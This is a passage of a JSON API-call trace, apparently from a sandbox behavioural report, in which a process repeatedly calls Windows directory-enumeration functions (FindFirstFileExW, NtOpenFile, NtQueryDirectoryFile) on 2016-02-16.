"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,199", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,229", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,239", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,249", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,259", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,269", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,279", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,289", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,299", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,299", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,299", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,299", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,299", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,309", "api": "NtQueryDirectoryFile"}, {"category": 